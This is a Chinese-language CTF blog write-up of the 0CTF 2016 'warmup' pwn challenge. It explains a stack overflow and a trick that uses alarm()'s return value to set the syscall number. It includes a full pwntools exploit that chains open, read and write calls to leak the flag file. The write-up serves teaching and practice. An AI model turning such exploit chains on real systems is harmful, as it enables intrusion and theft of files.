<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>warmup - 乐乐的小屋</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="乐乐的小屋"><meta name="msapplication-TileImage" content="/img/favicon.png"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="乐乐的小屋"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="总结根据本题，学习与收获有：  刚开始尝试利用read的返回值来构造execve的syscall，后来发现基本没有办法。后来查了下资料，才知道需要从alarm函数的返回值进行利用。虽然之前一直都知道alarm函数的功能，但是并不清楚其返回值是啥。 根据C语言alarm()函数：设置信号传送闹钟_C语言中文网 (biancheng.net)的解释，alarm()用来设置信号SIGALRM 在经过参数"><meta property="og:type" content="blog"><meta property="og:title" content="warmup"><meta property="og:url" content="https://roderickchan.github.io/2021/05/12/warmup/"><meta property="og:site_name" content="乐乐的小屋"><meta property="og:description" content="总结根据本题，学习与收获有：  刚开始尝试利用read的返回值来构造execve的syscall，后来发现基本没有办法。后来查了下资料，才知道需要从alarm函数的返回值进行利用。虽然之前一直都知道alarm函数的功能，但是并不清楚其返回值是啥。 根据C语言alarm()函数：设置信号传送闹钟_C语言中文网 (biancheng.net)的解释，alarm()用来设置信号SIGALRM 在经过参数"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162625455.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162838038.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162948363.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163456153.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163541563.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512165939550.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170041167.png"><meta property="og:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170145299.png"><meta property="article:published_time" content="2021-05-12T10:18:40.000Z"><meta property="article:modified_time" content="2021-05-12T09:06:50.757Z"><meta property="article:author" content="乐乐"><meta property="article:tag" content="pwn"><meta property="article:tag" content="alarm"><meta property="article:tag" content="syscall"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162625455.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://roderickchan.github.io/2021/05/12/warmup/"},"headline":"warmup","image":["https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162625455.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162838038.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162948363.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163456153.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163541563.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512165939550.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170041167.png","https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170145299.png"],"datePublished":"2021-05-12T10:18:40.000Z","dateModified":"2021-05-12T09:06:50.757Z","author":{"@type":"Person","name":"乐乐"},"description":"总结根据本题，学习与收获有：  刚开始尝试利用read的返回值来构造execve的syscall，后来发现基本没有办法。后来查了下资料，才知道需要从alarm函数的返回值进行利用。虽然之前一直都知道alarm函数的功能，但是并不清楚其返回值是啥。 根据C语言alarm()函数：设置信号传送闹钟_C语言中文网 (biancheng.net)的解释，alarm()用来设置信号SIGALRM 在经过参数"}</script><link rel="canonical" href="https://roderickchan.github.io/2021/05/12/warmup/"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><script>var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "//hm.baidu.com/hm.js?27073e91605117ab39e4af711d4afb4a";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();</script><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/cookieconsent/3.1.1/cookieconsent.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.4.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.png" alt="乐乐的小屋" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">主页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/about">关于我</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item copyright article-title type-2">原创</span><span class="level-item"><time dateTime="2021-05-12T10:18:40.000Z" title="2021-5-12 18:18:40">2021-05-12</time>发表</span><span class="level-item"><time dateTime="2021-05-12T09:06:50.757Z" title="2021-5-12 17:06:50">2021-05-12</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/CTF/">CTF</a><span> / </span><a class="link-muted" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></span><span class="level-item">7 分钟读完 (大约1019个字)</span><span class="level-item" id="busuanzi_container_page_pv"><span id="busuanzi_value_page_pv">0</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile"> warmup</h1><div class="copyright article-block type-2"><p>版权申明：本文为原创文章，转载请注明原文出处</p><p>原文链接：<a href="https://roderickchan.github.io/2021/05/12/warmup/" target="_blank">https://roderickchan.github.io/2021/05/12/warmup/</a></p></div><div class="content"><h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>根据本题，学习与收获有：</p>
<ul>
<li>刚开始尝试利用<code>read</code>的返回值来构造<code>execve</code>的<code>syscall</code>，后来发现基本没有办法。后来查了下资料，才知道需要从<code>alarm</code>函数的返回值进行利用。虽然之前一直都知道<code>alarm</code>函数的功能，但是并不清楚其返回值是啥。</li>
<li>根据<a target="_blank" rel="noopener" href="http://c.biancheng.net/cpp/html/334.html">C语言alarm()函数：设置信号传送闹钟_C语言中文网 (biancheng.net)</a>的解释，<code>alarm()</code>用来设置信号<code>SIGALRM</code> 在经过参数<code>seconds</code> 指定的秒数后传送给目前的进程。如果闹钟设置成功，那么之前设置的闹钟会被取消, 并将之前闹钟剩下的时间返回。根据这一性质，控制返回值，就控制了<code>eax</code>寄存器。</li>
</ul>
<span id="more"></span>

<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><h4 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h4><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162625455.png" alt="image-20210512162625455"></p>
<p>除了开启了<code>NX</code>保护，其他保护全部关闭。运行环境为<code>ubuntu18</code>。</p>
<h4 id="函数分析"><a href="#函数分析" class="headerlink" title="函数分析"></a>函数分析</h4><h5 id="start"><a href="#start" class="headerlink" title="start"></a>start</h5><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162838038.png" alt="image-20210512162838038"></p>
<p>函数流程为：</p>
<ul>
<li>设置闹钟为<code>10</code>秒</li>
<li>输出一段话</li>
<li>执行<code>main</code>函数</li>
<li>退出</li>
</ul>
<h5 id="main"><a href="#main" class="headerlink" title="main"></a>main</h5><p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512162948363.png" alt="image-20210512162948363"></p>
<p>很明显的栈溢出，读取结束后程序结束。</p>
<h4 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h4><p>漏洞点就在<code>main</code>函数的<code>read</code>处。<code>addr</code>距离<code>ebp</code>只有<code>0x20</code>的距离，但是可以读取<code>0x34</code>个字节大小。</p>
<p>这时需要使用<code>gdb</code>来看一下，需要覆盖多少。</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163456153.png" alt="image-20210512163456153"></p>
<p>看一下偏移，为<code>0x20</code></p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512163541563.png" alt="image-20210512163541563"></p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>如果利用<code>read</code>的返回值的话，需要提前布置好栈空间，但是溢出只有<code>0x14</code>个字节，并且每次需要溢出的时候，都会重新把<code>retaddr</code>置为<code>exit</code>函数的地址。如果溢出了，那么输入的字节数肯定超过<code>0xb</code>，所以这是相互矛盾的。因此，考虑从<code>alarm</code>函数入手。由于第一次设置闹钟<code>seconds</code>为<code>0xa</code>，那么往小于这个值的系统调用好来找，发现只有<code>open</code>符合我们的需求。所以，最后的利用思路为：</p>
<ul>
<li>利用栈溢出，往<code>data</code>段写入<code>flag</code>字符串，为<code>open</code>的系统调用做准备，然后再回到<code>main</code>函数</li>
<li>程序休眠<code>5</code>秒，然后利用栈溢出，执行<code>set_alarm</code>，得到返回值为<code>0x5</code>，然后执行<code>open</code>的系统调用，并回到<code>main</code>函数</li>
<li>栈溢出，利用<code>read(3, data_segment, 0x40)</code>，把<code>flag</code>读取到<code>data</code>段</li>
<li>栈溢出，使用<code>write(1, data_segment, 0x40)</code>输出<code>flag</code></li>
</ul>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><h4 id="调试过程"><a href="#调试过程" class="headerlink" title="调试过程"></a>调试过程</h4><p>不太好调试，但是但其实只要分析栈溢出那一步就行了，之后都是循环执行<code>main</code>函数</p>
<ul>
<li><p>调试一下栈溢出的点</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">welcome_str_addr = <span class="number">0x80491bc</span></span><br><span class="line">good_luck_str_addr = <span class="number">0x80491d3</span></span><br><span class="line">read_addr = <span class="number">0x804811d</span></span><br><span class="line">write_addr = <span class="number">0x8048135</span></span><br><span class="line">main_addr = <span class="number">0x804815a</span></span><br><span class="line">alarm_addr = <span class="number">0x804810d</span></span><br><span class="line">mov_ebx_syscall = <span class="number">0x8048122</span></span><br><span class="line"></span><br><span class="line">layout = [<span class="string">&#x27;a&#x27;</span> * <span class="number">0x20</span>, read_addr, main_addr, <span class="number">0</span>, good_luck_str_addr, <span class="number">0x60</span>]</span><br><span class="line">payload = flat(layout)</span><br><span class="line">sh.sendafter(<span class="string">&quot;Welcome to 0CTF 2016!\n&quot;</span>, payload)</span><br></pre></td></tr></table></figure>

<p>这里会执行<code>read</code>函数：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512165939550.png" alt="image-20210512165939550"></p>
<p>符合自己构造的栈布局</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170041167.png" alt="image-20210512170041167"></p>
</li>
</ul>
<p>最后远程的攻击效果为：</p>
<p><img src="https://lynne-markdown.oss-cn-hangzhou.aliyuncs.com/img/image-20210512170145299.png" alt="image-20210512170145299"></p>
<h4 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh: tube = process(<span class="string">&#x27;warmup&#x27;</span>)</span><br><span class="line">context.update(arch=<span class="string">&#x27;i386&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, endian=<span class="string">&#x27;little&#x27;</span>)</span><br><span class="line"></span><br><span class="line">welcome_str_addr = <span class="number">0x80491bc</span></span><br><span class="line">good_luck_str_addr = <span class="number">0x80491d3</span></span><br><span class="line">read_addr = <span class="number">0x804811d</span></span><br><span class="line">write_addr = <span class="number">0x8048135</span></span><br><span class="line">main_addr = <span class="number">0x804815a</span></span><br><span class="line">alarm_addr = <span class="number">0x804810d</span></span><br><span class="line">mov_ebx_syscall = <span class="number">0x8048122</span></span><br><span class="line"></span><br><span class="line">layout = [<span class="string">&#x27;a&#x27;</span> * <span class="number">0x20</span>, read_addr, main_addr, <span class="number">0</span>, good_luck_str_addr, <span class="number">0x60</span>]</span><br><span class="line">payload = flat(layout)</span><br><span class="line">sh.sendafter(<span class="string">&quot;Welcome to 0CTF 2016!\n&quot;</span>, payload)</span><br><span class="line"></span><br><span class="line">sh.sendafter(<span class="string">&quot;Good Luck!\n&quot;</span>, <span class="string">&quot;flag\x00&quot;</span>)</span><br><span class="line">sleep(<span class="number">5</span>)</span><br><span class="line">layout = [<span class="string">&#x27;a&#x27;</span> * <span class="number">0x20</span>, alarm_addr, mov_ebx_syscall, main_addr, good_luck_str_addr, <span class="number">0</span>]</span><br><span class="line">sh.send(flat(layout))</span><br><span class="line"></span><br><span class="line">layout = [<span class="string">&#x27;a&#x27;</span> * <span class="number">0x20</span>, read_addr, main_addr, <span class="number">3</span>, welcome_str_addr, <span class="number">0x40</span>]</span><br><span class="line">sh.recvline()</span><br><span class="line">sh.send(flat(layout))</span><br><span class="line"></span><br><span class="line">layout = [<span class="string">&#x27;a&#x27;</span> * <span class="number">0x20</span>, write_addr, <span class="number">0xdeadbeef</span>, <span class="number">1</span>, welcome_str_addr, <span class="number">0x40</span>]</span><br><span class="line">sh.recvline()</span><br><span class="line">sh.send(flat(layout))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="引用与参考"><a href="#引用与参考" class="headerlink" title="引用与参考"></a>引用与参考</h3><p>1、<a href="https://roderickchan.github.io/">My Blog</a></p>
<p>2、<a target="_blank" rel="noopener" href="https://ctf-wiki.org/">Ctf Wiki</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>warmup</p><p><a href="https://roderickchan.github.io/2021/05/12/warmup/">https://roderickchan.github.io/2021/05/12/warmup/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>乐乐</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-05-12</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-05-12</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/pwn/">pwn</a><a class="link-muted mr-2" rel="tag" href="/tags/alarm/">alarm</a><a class="link-muted mr-2" rel="tag" href="/tags/syscall/">syscall</a></div><div class="sharethis-inline-share-buttons"></div><script src="https://platform-api.sharethis.com/js/sharethis.js#property=606007929c00ae0011d418d7&amp;product=inline-share-buttons" defer></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/img/alipay.jpg" alt="支付宝"></span></a><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/img/wechat.png" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/05/03/sctf-2019-one-heap/"><span class="level-item">sctf_2019_one_heap</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="content" id="valine-thread"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/valine/1.4.14/Valine.min.js"></script><script>new Valine({
            el: '#valine-thread' ,
            appId: "Cm6SOyxcRow2ynGlFReSz3y4-gzGzoHsz",
            appKey: "oL6sTozQUPUAAe5Yl5JR4h9w",
            placeholder: "评论无需登录，可直接评论",
            avatar: "mp",
            
            meta: ["nick","mail"],
            pageSize: 10,
            lang: "zh-CN",
            visitor: true,
            highlight: true,
            
            
            
            
            
            requiredFields: [],
        });</script></div></div></div><!--!--><div class="column column-right is-4-tablet is-4-desktop is-4-widescreen  order-3"><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#总结"><span class="level-left"><span class="level-item">1</span><span class="level-item">总结</span></span></a></li><li><a class="level is-mobile" href="#题目分析"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#checksec"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">checksec</span></span></a></li><li><a class="level is-mobile" href="#函数分析"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">函数分析</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#start"><span class="level-left"><span class="level-item">2.2.1</span><span class="level-item">start</span></span></a></li><li><a class="level is-mobile" href="#main"><span class="level-left"><span class="level-item">2.2.2</span><span class="level-item">main</span></span></a></li></ul></li><li><a class="level is-mobile" href="#漏洞点"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">漏洞点</span></span></a></li></ul></li><li><a class="level is-mobile" href="#利用思路"><span class="level-left"><span class="level-item">3</span><span class="level-item">利用思路</span></span></a></li><li><a class="level is-mobile" href="#EXP"><span class="level-left"><span class="level-item">4</span><span class="level-item">EXP</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#调试过程"><span class="level-left"><span class="level-item">4.1</span><span class="level-item">调试过程</span></span></a></li><li><a class="level is-mobile" href="#完整exp"><span class="level-left"><span class="level-item">4.2</span><span class="level-item">完整exp</span></span></a></li></ul></li><li><a class="level is-mobile" href="#引用与参考"><span class="level-left"><span class="level-item">5</span><span class="level-item">引用与参考</span></span></a></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-05-12T10:18:40.000Z">2021-05-12</time></p><p class="title"><a href="/2021/05/12/warmup/">warmup</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-05-03T09:52:31.000Z">2021-05-03</time></p><p class="title"><a href="/2021/05/03/sctf-2019-one-heap/">sctf_2019_one_heap</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-05-02T04:40:44.000Z">2021-05-02</time></p><p class="title"><a href="/2021/05/02/VNCTF-2021-whitegive/">VNCTF_2021_whitegive</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/crypto%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">crypto做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-30T13:11:42.000Z">2021-04-30</time></p><p class="title"><a href="/2021/04/30/rootersctf-2019-srop/">rootersctf_2019_srop</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-24T02:12:11.000Z">2021-04-24</time></p><p class="title"><a href="/2021/04/24/houseoforange-hitcon-2016/">houseoforange_hitcon_2016</a></p><p class="categories"><a href="/categories/CTF/">CTF</a> / <a href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/">pwn做题记录</a></p></div></article></div></div><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">分类</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/CTF/"><span class="level-start"><span class="level-item">CTF</span></span><span class="level-end"><span class="level-item tag">18</span></span></a><ul><li><a class="level is-mobile" href="/categories/CTF/crypto%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">crypto做题记录</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/categories/CTF/pwn%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/"><span class="level-start"><span class="level-item">pwn做题记录</span></span><span class="level-end"><span class="level-item tag">17</span></span></a></li></ul></li><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/"><span class="level-start"><span class="level-item">工具与脚本</span></span><span class="level-end"><span class="level-item tag">3</span></span></a><ul><li><a class="level is-mobile" href="/categories/%E5%B7%A5%E5%85%B7%E4%B8%8E%E8%84%9A%E6%9C%AC/python/"><span class="level-start"><span class="level-item">python</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">标签</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/IO-FILE/"><span class="tag">IO_FILE</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/alarm/"><span class="tag">alarm</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/crypto/"><span class="tag">crypto</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fastbin-attack/"><span class="tag">fastbin attack</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/fini-array/"><span class="tag">fini.array</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/got-plt/"><span class="tag">got.plt</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-force/"><span class="tag">house of force</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/house-of-orange/"><span class="tag">house of orange</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/jmp-short/"><span class="tag">jmp short</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/malloc-hook/"><span class="tag">malloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/non-stack-printf/"><span class="tag">non-stack printf</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/one-gadget/"><span class="tag">one_gadget</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/print/"><span class="tag">print</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf/"><span class="tag">printf</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/printf-attack/"><span class="tag">printf attack</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/pwn/"><span class="tag">pwn</span><span class="tag">18</span></a></div><div class="control"><a class="tags has-addons" href="/tags/python/"><span class="tag">python</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc/"><span class="tag">realloc</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/realloc-hook/"><span class="tag">realloc_hook</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/rsa/"><span class="tag">rsa</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/shellcode/"><span class="tag">shellcode</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/srop/"><span class="tag">srop</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/stdout/"><span class="tag">stdout</span><span class="tag">3</span></a></div><div class="control"><a class="tags has-addons" href="/tags/syscall/"><span class="tag">syscall</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-bin-attack/"><span class="tag">tcache bin attack</span><span class="tag">4</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-dup/"><span class="tag">tcache dup</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-perthread-corruption/"><span class="tag">tcache perthread corruption</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/tcache-poisoning/"><span class="tag">tcache poisoning</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/template/"><span class="tag">template</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/top-chunk/"><span class="tag">top chunk</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/unlink/"><span class="tag">unlink</span><span class="tag">1</span></a></div><div class="control"><a class="tags has-addons" href="/tags/windows-terminal/"><span class="tag">windows terminal</span><span class="tag">1</span></a></div></div></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.png" alt="乐乐的小屋" height="28"></a><p class="is-size-7"><span>&copy; 2021 乐乐</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客, <span id="busuanzi_value_site_pv">0</span>次访问</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/RoderickChan"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
